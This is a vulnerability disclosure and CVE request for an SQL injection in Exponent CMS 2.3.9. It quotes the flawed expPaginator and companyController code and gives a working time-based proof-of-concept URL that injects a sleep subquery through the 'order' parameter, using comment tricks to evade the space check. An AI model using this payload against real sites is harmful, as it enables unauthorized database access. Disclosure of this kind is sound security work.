CVE request - Exponent CMS 2.3.9 SQL injection
From: 王禹哲 <0xtom4to () gmail com>
Date: Mon, 19 Sep 2016 08:17:53 -0400
Author: Tomato jianing.wang () chaitin com
Date: 2016-09-19
Version: 2.3.9 and earlier

In /exponent-2.3.9/framework/core/subsystems/expPaginator.php:

    if (strstr($this->order," ")) {
        $orderby = explode(" ",$this->order);
        $this->order = $orderby[0];
        $this->order_direction = $orderby[1];
    }
    if ($this->dontsort) $sort = null;
    else $sort = $this->order.' '.$this->order_direction;
    // figure out how many records we're dealing with & grab the records
    //if (!empty($this->records)) { //from Merge <~~ this doesn't work. Could be empty, but still need to hit.
    if (!empty($this->categorize)) $limit = null;
    else $limit = $this->limit;
    if (isset($params['records'])) { // if we pass $params['records'], we WANT to hit this
        // sort the records that were passed in to us
        if (!empty($sort)) usort($this->records,array('expPaginator', strtolower($this->order_direction)));
        // $this->total_records = count($this->records);
    } elseif (!empty($class)) { //where clause
        //FJD: was $this->class, but wasn't working...
        $this->total_records = $class->find('count', $this->where);
        $this->records = $class->find('all', $this->where, $sort, $limit, $this->start);
    } elseif (!empty($this->where)) { //from Merge....where clause
        $this->total_records = $class->find('count', $this->where);
        $this->records = $class->find('all', $this->where, $sort, $limit, $this->start);
    } else { //sql clause
        //FIXME we don't get attachments in this approach
        //$records = $db->selectObjectsBySql($this->sql);
        //$this->total_records = count($records);
        //this is MUCH faster if you supply a proper count_sql param using a COUNT() function; if not,
        //we'll run the standard sql and do a queryRows with it
        //$this->total_records = $this->count_sql == '' ? $db->queryRows($this->sql) : $db->selectValueBySql($this->count_sql); //From Merge
        // $this->total_records = $db->countObjectsBySql($this->count_sql); //$db->queryRows($this->sql); //From most current Trunk
        if (!empty($sort)) $this->sql .= ' ORDER BY '.$sort;

I can control $order, so I can use this parameter for SQL injection. For example, in exponent-2.3.9/framework/modules/company/controllers/companyController.php:

    function showall() {
        expHistory::set('viewable', $this->params);
        $page = new expPaginator(array(
            'model'=>$this->basemodel_name,
            'where'=>1,
            'limit'=>(isset($this->params['limit']) && $this->config['limit'] != '') ? $this->params['limit'] : 10,
            'order'=>isset($this->params['order']) ? $this->params['order'] : 'rank',
            'page'=>(isset($this->params['page']) ? $this->params['page'] : 1),
            'controller'=>$this->baseclassname,
            'action'=>$this->params['action'],
            'columns'=>array(
                gt('Manufacturer')=>'title',
                gt('Website')=>'website'
            ),
        ));
        assign_to_template(array(
            'page'=>$page,
            'items'=>$page->records
        ));
    }

The `order` request parameter is passed straight to expPaginator, which concatenates it into the ORDER BY clause without validation or escaping.

The PoC is:

    http://127.0.0.1/exponent-2.3.9/index.php?controller=company&action=showall&limit=1&order=(select/**/*/**/from/**/(select/**/sleep(5))x)%23

In the MySQL log we can see this:

    SELECT * FROM exponent_companies WHERE 1 ORDER BY (select/**/*/**/from/**/(select/**/sleep(5))x)# ASC LIMIT 0,10

Note that the payload uses `/**/` instead of spaces, so `strstr($this->order," ")` is false, the `explode()` branch is skipped and the whole value becomes `$this->order`; the trailing `%23` (`#`) comments out the direction (` ASC` in the log) that expPaginator appends. Because ORDER BY identifiers cannot be bound as prepared-statement parameters, the fix needs to validate `order` against an allow-list of the model's column names and restrict `order_direction` to ASC/DESC before building the query.

Could you assign a CVE ID for this?

Regards,
Tomato